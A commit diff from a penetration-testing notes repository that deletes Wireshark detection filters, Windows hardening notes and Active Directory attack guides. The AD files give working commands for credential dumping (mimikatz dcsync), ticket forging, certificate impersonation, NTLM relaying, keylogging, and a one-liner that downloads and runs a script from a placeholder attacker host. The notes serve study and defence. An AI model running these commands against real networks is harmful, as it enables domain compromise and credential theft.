whx
/
killchain-compendium
1
0
Fork 0
Code Issues Pull Requests Projects Releases Wiki Activity

cleanup

This commit is contained in:
Stefan Etringer 2022-11-13 16:02:41 +01:00
parent bf10390dc5
commit b4524785b7
89 changed files with 0 additions and 8659 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

12
.gitmodules vendored
View File

@ -34,9 +34,6 @@
[submodule "enumeration/priv_esc/deepce"]
path = enumeration/priv_esc/deepce
url = https://github.com/stealthcopter/deepce.git
[submodule "misc/PowerSploit"]
path = misc/PowerSploit
url = https://github.com/PowerShellMafia/PowerSploit.git
[submodule "exploit/web/content_security_policy/JSONBee"]
path = exploit/web/content_security_policy/JSONBee
url = https://github.com/zigoo0/JSONBee.git
@ -91,9 +88,6 @@
[submodule "exploit/java/log4j-scan"]
path = exploit/java/log4j-scan
url = https://github.com/fullhunt/log4j-scan.git
[submodule "misc/static-binaries"]
path = misc/static-binaries
url = https://github.com/andrew-d/static-binaries.git
[submodule "exploit/windows/printspoofer"]
path = exploit/windows/printspoofer
url = https://github.com/dievus/printspoofer.git
@ -154,12 +148,6 @@
[submodule "exploit/GitTools"]
path = exploit/GitTools
url = https://github.com/internetwache/GitTools
[submodule "misc/nishang"]
path = misc/nishang
url = https://github.com/samratashok/nishang.git
[submodule "misc/printer_hacking/PRET"]
path = misc/printer_hacking/PRET
url = https://github.com/RUB-NDS/PRET.git
[submodule "misc/level3_hypervisor/docker_sec/dive"]
path = misc/level3_hypervisor/docker_sec/dive
url = https://github.com/wagoodman/dive.git

333
misc/BPF Filter.md
View File

@ -1,333 +0,0 @@
# Wireshark BPF Filters
* This is a collection of bpf and wireshark filters to find specific network situations.
## TCP Scans
* Recognize nmap scans in traffic
### TCP Connect Scan
* Has a TCP window size larger than 1024 bytes
Open TCP Port looks like
```sh
SYN -->
<-- SYN, ACK
ACK -->
```
or
```sh
SYN -->
<-- SYN,ACK
ACK -->
RST, ACK -->
```
Closed TCP Port
```sh
SYN -->
<-- RST, ACK
```
* Find TCP Connect scan pattern
```bpf
tcp.flags.syn == 1 && tcp.flags.ack == 0 && tcp.window_size > 1024
```
### TCP Half Open SYN Scan
* Lower or equal to 1024 bytes windows size
Open TCP Port looks like
```sh
SYN -->
<-- SYN, ACK
RST -->
```
Closed TCP Port looks like
```sh
SYN -->
<-- RST, ACK
```
* Find half open SYN scan pattern
```bpf
tcp.flags.syn == 1 && tcp.flags.ack == 0 && tcp.window_size <=1024
```
## UDP Scans
Open UDP Port looks like
```sh
UDP packet -->
```
A closed UDP port is recognizable by an ICMP Type 3 reply
```sh
UDP packet -->
<-- ICMP Type 3
```
* Find UDP scan pattern with closed ports as a reply
```bpf
icmp.type==3 and icmp.code==3
```
## ARP
* Find ARP requests
```bpf
arp.opcode == 1
```
* Find ARP responses
```bpf
arp.opcode == 2
```
* Find MAC address
```sh
arp.dst.hw_mac == 00:00:DE:AD:BA:BE
```
* Detect ARP Poisoning
```bpf
arp.duplicate-address-detected or arp.duplicate-address-frame
```
* Detect ARP Flooding
```bpf
((arp) && (arp.opcode == 1)) && (arp.src.hw_mac == <TARGET_MAC>)
```
## DHCP Analysis
* `dns` or `bootp`
* DHCP Request
```sh
dhcp.option.dhcp == 3
```
* DHCP ACK
```sh
dhcp.option == 5
```
* DHCP NAK
```sh
dhcp.option == 6
```
* Other DHCP options
* 12 Hostname.
* 15 domain name
* 51 Requested IP lease time.
* 61 Client's MAC address
* 50 Requested IP address.
* 51 assigned IP lease time
* 56 Message rejection details
## NetBIOS
* `nbns`
* NetBIOS details are the interesting info, for example
```sh
nbns.name contains "foo"
```
## Kerberos
* `kerberos`
* Search for cname information
```sh
kerberos.CNameString contains "foo"
```
* Find machine hostnames
```sh
kerberos.CNameString and !(kerberos.CNameString contains "$")
```
* Find Kerberos protocol version
```sh
kerberos.pvno == 5
```
* Domain name for a created Kerberos ticket
```sh
kerberos.realm contains ".foo"
```
* Service and domain name for the created Kerberos ticket
```sh
kerberos.SNnameString == "krbtg"
```
## Tunneled Traffic
### ICMP Exfiltration
* `icmp`
* Check for destination, packet length or encapsulated protocols
```sh
icmp && data.len > 64
```
### DNS Exfiltration
* `dns`
* Check for query length, unusual, encoded or long DNS address name queries
* Check for dnscat and dns2tcp or high frequency of DNS queries
```sh
dns contains "dns2tcp"
dns contains "dnscat"
dns.qry.name.len > 15 !mdns
```
## FTP Traffic
```sh
ftp.response.code == 211
```
* FTP response codes
* __211__, System status
* __212__, Directory status
* __213__, File status
* __220__, Service ready
* __227__, Entering passive mode
* __228__, Long passive mode
* __229__, Extended passive mode
* __230__, User login
* __231__, User logout
* __331__, Valid username
* __430__, Invalid username or password
* __530__, No login, invalid password
* Some FTP commands
* __USER__, Username
* __PASS__, Password
* __CWD__, Current work directory
* __LIST__, List
* FTP Commands can be found via
```sh
ftp.request.command == "USER"
ftp.request.arg == "password"
```
* __Bruteforce signal__, list failed login attempts
```sh
ftp.response.code == 530
```
* __Bruteforce signal__, List target username
```sh
(ftp.response.code == 530) && (ftp.response.arg contains "username")
```
* __Password spray signal__, List targets for a static password
```sh
(ftp.request.command == "PASS") && (ftp.request.arg == "password")
```
## HTTP
* `http` or `http2`
* HTTP methods can be searched for
```sh
http.request.method == "GET"
http.request
```
* HTTP response codes
* __200__, OK
* __301__, Moved Permanently
* __302__, Moved Temporarily
* __400__, Bad Request
* __401__, Unauthorised
* __403__, Forbidden
* __404__, Not Found
* __405__, Method Not Allowed
* __408__, Request Timeout
* __500__, Internal Server Error
* __503__, Service Unavailable
```sh
http.response.code == 200
```
* HTTP header parameters
```sh
http.user_agent contains "nmap"
http.request.uri contains "foo"
http.request.full_uri contains "foo"
```
* Other HTTP header parameters
* __Server__: Server service name
* __Host__: Hostname of the server
* __Connection__: Connection status
* __Line-based text data__: Cleartext data provided by the server
```sh
http.server contains "apache"
http.host contains "keyword"
http.host == "keyword"
http.connection == "Keep-Alive"
data-text-lines contains "keyword"
```
* HTTP User Agent and the usual tools to find
```sh
http.user_agent
(http.user_agent contains "sqlmap") or (http.user_agent contains "Nmap") or (http.user_agent contains "Wfuzz") or (http.user_agent contains "Nikto")
```
### HTTP and Log4j
```sh
http.request.method == "POST"
(ip contains "jndi") or ( ip contains "Exploit")
(frame contains "jndi") or ( frame contains "Exploit")
(http.user_agent contains "$") or (http.user_agent contains "==")
```
## HTTPS
* __Client Hello__, (http.request or tls.handshake.type == 1) && !(ssdp)
* __Server Hello__,(http.request or tls.handshake.type == 2) && !(ssdp)
* Put in pre-shared key via `Edit --> Preferences --> Protocols --> TLS`
* __Get the pre-shared key via__
```sh
ip xfrm state
```
* Alternatively use a Pre-Master-Secret log file to decode TLS
## Plain Text Credentials
`Tools` -> `Credentials` shows all the plain text credentials inside the pcap file
## Firewall ACLs Rules
Create FW ACL rules via `Tools` -> `Firewall ACL Rules`. Rule can be created for
* iptables
* IOS
* ipfilter
* ipfw
* pf
* netsh

88
misc/Blue Teaming/windows-hardening.md
View File

@ -1,88 +0,0 @@
# Windows hardening
## UAC Sharpening
* Control Panel -> User Accounts -> Change User Account Control Setting -> Set to "Always Notify"
## User and Group Policy
* Local Group Policy Editor
## Password Policy
* Security Settings -> Account Policies -> Password policy
* Local Security Policy -> Windows Settings -> Account Policies -> Account Lockout Policy
## Windows Defender
### Antivirus
* Check excluded file endings: Settings -> Windows Security -> Virus & Threat Protection -> Virus & threat protection settings -> Manage Settings -> Exclusions -> Add or remove exclusions
### Firewall
* wf.msc -> Windows Defender Firewall Properties -> Public / Private Profile -> Inbound connections -> On
* wf.msc -> Windows Defender Firewall Properties -> Monitoring -> Check the active Profile
## Network
### Disable Unused Interfaces
* Control Panel -> System and Security Setting -> System -> Device Manager
### SMB
* Disable SMB via Powershell
```sh
Disable-WindowsOptionalFeature -Online -FeatureName SMB1Protocol
```
### Hosts File
* Check `C:\Windows\System32\Drivers\etc\hosts` for unwanted domain resolution
### ARP
* After potential ARP poisoning the cache can be deleted via `arp -d`
### RDP
* Settings -> Windows Security Settings -> For developers -> Remote Desktop -> Show settings -> Don't allow remote connections to this computer
## Third Pary Applications
### Signed Software Only
* Settings -> Select Apps and Features -> Choose where to get apps -> The Microsoft Store only
### Applocker
* Local Group Policy Editor -> Windows Settings -> Security Settings -> Application Control Policies -> AppLocker
## Web Browsing
### Edge
* Settings -> Windows Security -> App and Browser Control -> Reputation-based Protection -> SmartScreen for Microsoft Edge -> On
* Edge -> `edge://settings/privacy` -> Privacy, Search and Services -> Tracking Prevention -> Strict
## Encryption
### BitLocker
* Control Panel -> System and Security -> BitLocker Drive Encryption -> Turn on BitLocker
## Sandbox
* Settings -> Windows Features -> Windows Sandbox -> OK
## Secure Boot
* Check status under: msinfo32 -> System Summary -> BIOS Mode / Secure Boot State
## Backups
* Settings -> Update & Security -> Backup -> Backup using File History

62
misc/Diamond Model.md
View File

@ -1,62 +0,0 @@
# Diamond Model
* [Socinvestigation's article](https://www.socinvestigation.com/threat-intelligence-diamond-model-of-intrusion-analysis/)
## Adversary
Any actor utilizing capability against the victim to achieve a goal
## Capability
Describes TTPs used in the attack. Every capability has a capacity. Adversary Arsenal is the overall capacity of an attacker's capabilities.
## Infrastructure
Physical and logical communication structures the attacker uses to deliver a capability, C2, exfiltration.
* Type 1: Belongs to the adversary
* Type 2: Is used by the adversary as a proxy from which the attack is send
* Other Service Providers: Any service used to reach the goal of an adversary
## Victim
The target the adversary exploits. May be a person or a technical system.
## Meta Features
### Timestamp
* Events are logged with timestamps
### Phase
Events happen in succession of multiple steps.
### Result
Approximate or full goal of the adversary.
### Methodology
Malicious activities are categorized to differentiate the methods of attack
### Resources
All supporting elements an event depends on.
* Software
* Hardware
* Funds
* Facilities
* Access
* Knowledge
* Information
### Technology and Direction
Connects infrastructure and capabilities.
### Socio-Political
An existing relationshiop between the adversary and the victim

65
misc/Killchains.md
View File

@ -1,65 +0,0 @@
# Security Killchains
Frameworks of killchains are inherited from the military and separate steps in which an attack occurs.
## Lockheed & Martin
* [Lockheed & Martin's Cyber Kill Chain Website](https://www.lockheedmartin.com/en-us/capabilities/cyber/cyber-kill-chain.html)
1. Reconnaissance
2. Weaponization
3. Delivery
4. Exploitation
5. Installation
6. Command & Control
7. Actions on Objectives
## Mitre ATT&CK Matrix
[Mitre ATT&CK](https://attack.mitre.org) is a matrix of __Tactics, Techniques and Procedures (TTP)__ of adversaries called __Adanced Persistent Threats (APT)__. The tactics are
1. Reconnaissance
2. Resource Development
3. Initial Access
4. Execution
5. Persistence
6. Privilege Escalation
7. Defense Evasion
8. Credential Access
9. Discovery
10. Lateral Movement
11. Collection
12. Command and Control
13. Exfiltration
14. Impact
[Crowdstrike](https://crowdstrike.com) as a threat intelligence tool is built on the Mitre ATT&CK framework.
## Unified Cyber Kill Chain
[The Unified Cyber Kill Chain](https://unifiedkillchain.com) is the youngest and
most detailed framework and builds upon the other frameworks. It contains combined
stages which are seen as lifecycles with potentially repeatable steps.
1. Reconnaissance
2. Weaponization
3. Delivery
4. Socical Engineering
5. Exploitation
6. Persistance
7. Defense Evation
8. Command & Control
9. Pivoting
10. Discovery
11. Privilege Escalation
12. Execution
13. Credential Access
14. Lateral Movement
15. Collection
16. Exfiltration
17. Impact
18. Objectives
Mentioned lifecycles are __Inital Foothold__, __Network Propagation__ and
__Actions on Objective__

1
misc/PowerSploit

@ -1 +0,0 @@
Subproject commit d943001a7defb5e0d1657085a77a0e78609be58f

82
misc/active_directory/AD_CS.md
View File

@ -1,82 +0,0 @@
## Active Directory Certificate Service ADCS
* Internal CA
* PKI
* File system encryption
* Digital signatures
* User authentication
* __Certificates will not be revoked after account password reset__
## Certificate Templates
* Extended/Enhanced Key Usage (EKU)
* Parameter combination can be exploited
* User Certificates may be requested from a member of a Domain User Group
* Machine Certifcates may be requested from a host of a Domain Computer Group
### Enumeration
* [PSPKIAudit](https://github.com/GhostPack/PSPKIAudit)
```sh
certutil -v -template > ct.txt
```
Exploitable templates should have the following traits:
* `Allow Enroll` or `Allow Full Control` permissions to request certificate
* Find groups by `net user <username> /domain` --> `Domain Users`, `Domain Computers`
* Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
### Certificate Creation
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
* After that in the main menu, `Certificates` --> right click on `Personal` --> `All Tasks` --> `Request Certificates` --> `Next` --> `Next` --> `More information is required to enroll this certificate` --> `Common Name` --> `CN=concerto` && `User Principal Name` is the user to impersonate --> `OK` --> select `User Request` --> `Enroll`
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
### Impersonation
* Request TGT with the created cert
* Grab TGT
* On the machine via
```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
```
* Select a domain admin via opening `Active Directory Users and Computers`
```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
```
* `runas /user:<domain>\<username of DA> cmd.exe`
* Alternatively, load the outfile of rubeus via mimikatz to authenticate as the impersonated user on a remote domain
```sh
privilege::debug
kerberos::ptt <name of file to write TGT to.kirbi>
exit
dir \\<domain>\<dir>$\
```
## CVE-2022-26923
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions
* User and Machine certificate templates
* User Principal Name is used for `SAN`, this template can not be modified in a way to escalate privileges
* Computer accounts DNS name is used for `SAN`
* Users of the Authenticated Users Group can create 10 Machine Certificates
* __DNS hostname__ is used for authentication
* __Service Principal Names (SPN)__, associates a service logon with a service instance. SPNs are unique
* Permissions of interest, all two are needed
* Validate write to DNS hostname allows to update DNS hostname of AD object associated with the host
* Validate write to SPN, update SPN of the AD object associated with the host
### Usage
* User account has to be compromised, use it to enrol a new host on the domain
* Alter the DNS hostname attribute of the AD Object to one of a Domain Controller or other higher privilege
* Remove the SPN attribute to bypass the unique SPN
* With the default template request the machine cert
* authenticate via Kerberos with the template as the higher privileged machine

186
misc/active_directory/active_directory.md
View File

@ -1,186 +0,0 @@
# Active Directory Enumeration
* Offers authentication in the form of centralized __IAM__ a.k.a __SSO__ and authentication via __Policy Management__
* There are user accounts acting on machine accounts (services), in general
* Consists of
* __Domain Controller__
* __Organizational Units__, (security principals) can be common user or machine accounts
* Users
* Groups
* __Trusts__
* __AD Domains__
* __AD Forest__
* __Policies__
* Administrative accounts are
* __Domain Admin__
* __Enterprise Admin__
* __Schema Admin__
* __Server Operator__
* __Account Operator__
## Domain Controller
* AD Domain Services (AD DS) data store stores all objects on the network
* Authentication and authorization
* Update replication / sync with other domain controllers in the forest
* Administration of domain resources
### AD DS Store
* Database of directory info such as users, groups and services
* `ntdis.dit` contains the information, including password hashes
* `SystemRoot%\NTDS`
### Forest
Consists of the following objects
* __Trees__, hierarchy of domains in the AD Domain Services
* __Domains__, groups of objects
* __Organizational Units (OU)__, containers of objects such as groups, users, printers and other resources
* __Trusts__, allows users to access resources in a different domain
* __Objects__ users, groups, printers, computers or shares
* __Domain Services__, DNS, LLMNR, SMB
* __Domain Schema__, Rules for object creation
### Users
* __Domain Admin__, DC access
* __Server Accounts__, service maintenance, may have admin permissions
* __Local Admin__, administrative persmission on an object but not the DC
* __Domain Users__, average user account on a local machine which may have admin permissions
* __Machine users__,
* Machine accounts have local administrational permissions
* Can be recognized by a `$` at the end of the ID
* Their passwords are rotated on a schedule
* Passwords are 120 characters long per default
### Security Groups
Important groups are the following
* __Domain Controllers__, every DC in the domain
* __Domain Admins__, dc access
* __Server Operators__, administration of domain controllers but not groups
* __Backup Operators__, full read access to any file
* __Account Operators__, able to provision accounts
* __Domain Users__, every user account in the domain
* __Domain Computers__, every machine account in the domain
* [Security Groups doc](https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups)
### Policies
* Rule sets
* Apply to a domain
* Enable or disables services on a domain basis, like antivirus and malware scanning
* __Disable Windows Defender__
* Communication signing, e.g. SMB
### Domain Services
* __LDAP__
* __Certificates__ handling for services, CRL
* __DNS, LLMNR, NBT-NS__
### Authentication
* __NTLM__, ticket granting service
* __Kerberos__, challenge/response via hashes
## Enumration
* Cmdlets on Domain Controller
* Get some help, `Get-Help Get-Command -Examples`, `Get-Command Get-*`
* From `ActiveDirectory` module
```sh
Import-Module Active-Directory
Get-ADDomain | Select-Object NetBIOSName,DNSRoot,InfrastructureMaster
Get-ADForest | Select-Object Domains
Get-ADTrust -Filter * | Select-Object Direction,Source,Target
```
* `systeminfo | findstr Domain`
* `Get-ADUser -filter *`
* Use found CN and DC and specify
* `Get-ADUser -filter * -searchBase "CN=Users,DC=<foundDC>,DC=<domainEnding>"`
### Powerview Module
* [Powerview](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)
```sh
Import-Module .\PowerView.ps1
Get-NetDomain
Get-NetDomainController
Get-NetForest
Get-NetDomainTrust
```
### DNS
* Check ip via `ipconfig`
* `nslookup`, then `server <LocalIP>` and zone transfer via
```sh
ls -d <Domain>
```
### Tips & Tricks
* Download and execute in one line
```sh
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%:8000/PowerVi
ew.ps1'); Get-NetUser | select samaccountname, description"
```
## Configuration
### Configure Users and Groups
* Use Start -> "Active Directory and Computers" to provision AD objects via __organizational units (OU)__
* A set of users as a group with set policies are defined as __organizational unit (OU)__
* A user is unique to a single OU
* Default OUs are the following
* __Builtin__
* __Users__, user accounts
* __Computers__, machine accounts
* __Domain Controllers__, contains DC in the domain
* __Managed Service Accounts__, service accounts in the domain
* To __delete__ a OU use `View` -> `Advanced Features`. Properties menu of the OU via right click shows the checkbox `Protect object from accidental deletion` under `Object` tab -> uncheck it and delete the OU afterwards
* To __delegate__ open properties with right click -> `Next` -> `Delegate Control` -> `Add` -> Choose user and OK -> `Next` -> Choose tasks to delegate -> `Next` -> `Finish`
* To __change__ a user password via powershell
```sh
Set-ADAccountPassword <user> -Reset -NewPassword (Read-Host -AsSecureString -Prompt 'New Password') -Verbose
```
* To let the user __change__ the password at the next login
```sh
Set-ADUser -ChangePasswordAtLogon $true -Identity <username> -Verbose
```
### Managing Machine Users
* `Computer` OU should be split into at least `Workstations` and `Servers`
### Group Policies
* __Group Policy Objects__ are applied to OUs
* Use the application `Group Policy Management` to apply policies to UOs
* GPOs under `Group Policy Objects` for the specific domain can be modified. These will be inherited to all UOs. You can see the links to the OUs on the right hand site if you click the GPO on the left
* Child OUs inherit the policies from parent UOs
* `Security Filters` can be set as well here
* The `Settings` tab of a policy shows its actual content
* Right click on a Policy -> `Edit` to change the content of the policy. There are templates for multiple common policies
* `SYSVOL` as a SMB share is used to distribute the GPOs in the domain, it maps to `C:\Windows\SYSVOL\sysvol\` on the domain controller
* To force an update of changed policies across the domain do
```sh
gpupdate /force
```

117
misc/active_directory/ad_enumeration.md
View File

@ -1,117 +0,0 @@
# Enumerate Active Directory
Enumeration following after initial credentials are gained
## SYSVOL
* On windows use `runas` and gain local administrative permissions via
```sh
runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe
```
* Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access
* Query DNS, for example the DC
```sh
$dnsip = "<DC IPaddress>"
$index = Get-NetAdapter -Name '<Ethernet>' | Select-Object -ExpandProperty 'ifIndex'
Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip
```
* Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth
```sh
dir \\%HOSTNAME%\SYSVOL\
```
* Check `SYSVOL` via `IP` address to force `NTLM` authentication
## Microsoft Management Console (MMC)
* Use AD Snap-ins of `Remote Server Administrative Tools`
* Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install
* `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features
* Start enumerating via click on the domain object in the tree on the left
* Take a look at `People` directory -> right click on them to see properties
* Change or create user or change groups
* Also use `MMC` to enumerate
## CMD enumeration
Execute from domain joined machine
* Users
```sh
net user /domain
```
* Specific user
```sh
net user <username> /domain
```
* Groups
```sh
net group /domain
```
* Specific group
```sh
net group <groupname> /domain
```
* Password Policy via accounts
```sh
net accounts /domain
```
## Powershell Cmdlets
* User details via
```sh
Get-ADUser -Identity <username> -Server <fqdn/or/DCdomain> -Properties *
```
* Groups
```sh
Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties *
```
* Group membership
```sh
Get-ADGroupMember -Identity Administrators -Server exampleDC.com
```
* Generic AD objects
```sh
Get-ADObject -Filter <filterstuff> -includeDeletedObjects -Server exampleDC.com
Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com
```
* Domains
```sh
Get-ADDomain -Server exampleDC.com
```
## Sharphound and Bloodhound
* [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#)
* Change to AD user via `runas.exe` and collect via one of the following
* Sharphound.ps1
* sharphound.exe
* Azurehound.ps1
* For example
```sh
Sharphound.exe --CollectionMethods <Default/Session/All> --Domain example.com --ExcludeDCs
```
* After some time collect the current sessions via
```sh
Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs
```
* Start neo4j db
```sh
neo4j console start
```
* Start bloodhound
```sh
bloodhound --no-sandbox
```
* Drag and Drop the zip file from Sharphound
* Either search for AD objects and use `Analysis` to find an attack path through the info on the edges
* Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts
## LDAP
## PowerView
## WMI

183
misc/active_directory/ad_misconfiguration.md
View File

@ -1,183 +0,0 @@
# Active Directory Misconfigurations
## Permission Delegation
* Permissions to functions may be delegated as a standard functions itself
* Privilege creep becomes a problem eventually
* Discretionary ACLs are controlled by Access Control Entries (ACEs)
### The following ACEs are critical and prone to be exploited
* __GenericAll__, complete control and creation of an object
* __ForceChangePassword__, change the password of a user and sometimes administrator passwords
* __AddMembers__, add a user to an existing group
* __GenericWrite__, update any non-protected parameters of the target, e.g. paths to scripts.
* __WriteOwner__, change owner of a target object.
* __WriteDACL__, create new ACEs to an object's DACL
* __AllExtendendRights__ all control over an object's permission
### Tools to exploit ACEs
* AD-RSAT
* Powersploit
* BloodHound, check permissions to target
### Usage
* Add user to a group via powershell
```sh
Add-GroupMember "<GroupName>" -Members "<username>"
```
* List info about groups, preferably administration groups
```sh
Get-ADGroupMember -Identity "<GroupName>"
```
* __Set new password for user__, afterwards reconnect session
```sh
$Password = ConvertTo-SecureString "password123#" -AsPlainText -Force
Set-ADAccountPassword -Identity "<username>" -Reset -NewPassword $Password
```
## Kerberos Delegation
* Unconstrained (without limit) delegation, [exploit](https://medium.com/@riccardo.ancarani94/exploiting-unconstrained-delegation-a81eabbd6976)
* Constrained delegation
* Resource based constrained delegation (RBCD), service owner specifies which resources can bind. Set by [msDS-AllowedToActOnBehalfOfOtherIdentity](https://stealthbits.com/blog/resource-based-constrained-delegation-abuse/)
### Delegatable Services
* __HTTP__
* __CIFS__
* __LDAP__
* __HOST__
* __MSSQL__
### Usage
* Enumerate via powerview
```sh
Import-Module .\PowerView.ps1
Get-NetUser -TrustedToAuth
```
## Automated Relays
### Machine Accounts
* Administrative machine account of one host having administrative permissions over another host
### Printers
* Target has to have an SMB server
* Spooler, PetitPotam, PrintNightmare are printer exploits
* Query printer services through a servers domain
```sh
GWMI Win32_Printer -Computer <domain>
Get-PrinterPort -ComputerName <domain>
```
* SMB signing may be enabled but must not be enforced in order for the exploit to work, check via
```sh
nmap --script smb2-securitymode -p 445 printer.example.com plotter.example.com
```
* Start SMB relay on attacker, use IP instead of domain to trigger NTLM auth
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug
```
* Authenticate on attacker with the credentials already gained from a windows computer
```sh
SpoolSample.exe <domain> "$ATTACKER_IP"
```
* Authenticate with the received credential
```sh
ntlmrelayx.py -smb2support -t smb://"$TARGET_IP" -debug -c 'whoami /all' -debug
```
## Active Directory Users
### Credentials
### Keylogging
* With a meterpreter shell migrate to an active user's process and set a keylogger
```sh
migrate <processID>
keyscan_start
```
* To inspect the results
```sh
keyscan_dump
```
## Group Policy Objects
* Every `GPO` has a `GUID`
* Local Policies are configured for application rules for FW, Windows-Defender, Applocker
* Other local policies are group memberships, startup config, protocols
* Group policies change configuration of these remotely over AD
* `GPOs` are stored on the `SYSVOL` to be distributed to any machine in the domain
### Usage
* Target is to add the user to either an RDP or SSH group and to connect via this group afterwards
* Start a `cmd` with a AD user and execute `mmc` through it
```sh
runas /netonly /user:<domain>\<username> cmd.exe
mmc
```
* Check connection of the `cmd.exe` via
```sh
dir \\<domain>\sysvol
```
* Click `File` -> Add/Remove Snap-in -> `Group Policy Management` -> `OK`
* On the left tree do `Group Policy Management` -> `Forest bla` -> `Domains` -> `<domain>` -> `Server` -> `Management Servers` and right click to edit the group
* On the left tree `Computer Configuration` -> `Policies` -> `Windows Settings` -> `Security Settings` -> right click `Restricted Groups` -> `Add Group` -> name like `IT Support` -> edit the group and Add `Administrators` and `Remote Desktop Users` groups
## Certificates
* [AD Certificate Services](./AD_CS.md)
## Domain Trusts
* Domain Trusts offer access to resources to users in the domain
* Directional, from trusted domain to another truster domain
* Transitive, beyond more than just one other domain
* Pwn parent child relationship between directional domain trusts via krbtgt and a golden ticket
* `krbtgt` as an account signs and encrypts TGTs
* Crafting a golden ticket by becoming a TGS. Following info is needed
* FQDN
* Security identifier of the domain (SI)
* Target's username
* __KRBTGT password hash__ store on the DC
### Usage
* `KRBTGT` via Mimikatz, resulting in `Hash NTLM`
```sh
privilege::debug
lsadump::dsync /user:<username\kbtgt>
```
* Craft the ticket with the help of this hash
* Alternatively, InterRealm TGTs are used to get resources between domains in order to pwn the parent by adding the Enterprise Admin group as an extraSID,commonly this is `S-1-5-21-<RootDomain>-519`
* SID of Child DC is needed, as well as the SID of the Enterprise Admin in the parent domain
* Get child SIDs via
```sh
Get-ADComputer -Identity "<DCChildCN>"
```
* Get parent SID via
```sh
Get-ADGroup -Identity "Enterprise Admins" -Server <domain>
```
* Include additional SIDs from other domains into `KERB_VALIDATION_INFO` via Mimikatz
```sh
privilege::debug
kerberos golden /user:Administrator /domain:<child.domain> /sid:<ChildSID> /service:kbtgt /rc4:<NTLMHash of krbtgt> /sids:<Enterprise Admin group SID> /ptt
exit
dir \\DCdomain\dir$
dir \\Parentdomain\dir$
```

198
misc/active_directory/ad_persistence.md
View File

@ -1,198 +0,0 @@
# Active Directory Persistance
## Using Credentials
* __Knowledge Consistency Checker (KCC)__ replicates credentials through the forest
* __DC Synchronisation__ is the process of syncing credentials between domain controllers, it can be used to gather credentials
* Credentials for multiple local administrators
* Service account with delegation permissions
* __Service accounts with high AD permissions__, Windows Server Update Services (WSUS), System Center Configuration Manager (SCCM)
### Usage
* Use mimikatz
```sh
lsadump::dcsync /domain:<domain> /user:<username>
```
* To query the krbtgt user
```sh
lsadump::dcsync /domain:<domain> /user:krbtgt.<domain>
```
* Query everything
```sh
lsadump::dcsync /domain:<domain> /all
```
## Using Tickets
* __Golden Ticket__ crafted TGT,
* Needs domain name, domain SID and a user ID to impersonate
* Needs krbtgt NTLM to sign the ticket
* krbtgt hash never rotates automatically, only refreshed manually
* krbtgt hash bypasses smart cards
* TGT can not be older than 20 minutes
* TGT lifetime can be set to years
* TGT can be signed anywhere as long as the krbtgt hash is known
* __Silver Ticket__ crafted TGS
* Signed by targeted service account on a host
* DC is never contacted, no contact to any TGT or KDC
* Non existing user can be used with a local admin group's SID
### Usage
* Craft a golden ticket
```sh
Get-ADDomain
```
```sh
kerberos::golden /admin:MyLittleAdministrator /domain:<domain> /id:500 /sid:<Domain SID> /target:<Hostname of server being targeted> /rc4:<NTLM Hash of machine account of target> /service:cifs /ptt
```
## Using Certificates
* Private key extraction via mimikatz which makes it exportable
```sh
crypto::certificates /systemstore:local_machine
privilege::debug
crypto::capi
crypto::cng
crypto::certificates /systemstore:local_machine /export
```
* Password of the certificate is `mimikatz` afterwards
* Use [ForgeCert](https://github.com/GhostPack/ForgeCert) to create certificate
```sh
ForgeCert.exe --CaCertPath <domain>.pfx --CaCertPassword mimikatz --Subject CN=User --SubjectAltName Administrator@<domain> --NewCertPath Administrator.pfx --NewCertPassword SecretPassword
```
*
* Use Rubeus to request the TGT via
```sh
Rubeus.exe asktgt /user:Administrator /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to> /domain:<domain> /dc:<IP of domain controller>
```
* Load the TGT via mimikatz
```sh
privilege::debug
kerberos::ptt administrator.kirbi
dir \\<dc.example.com>\C$\
```
## Using SID History
* Account logs on -> associated SIDs (group SIDs) added to the user's token -> permissions are set in this way
* SIDs of controlled accounts may be added to the history
* Add Administrator group to the associated SIDs / the token
* `ntds.dit` stores all AD info
* User does not come up on checking groups, the user stays hidden unless searched for explicitly
### Usage
* Check SID history
```sh
Get-ADUser <your ad username> -properties sidhistory,memberof
```
* Check SID of domain admins
```sh
Get-ADGroup "Domain Admins"
```
* Use [DSInternals](https://github.com/MichaelGrafnetter/DSInternals) to patch `ntds.dit`
```sh
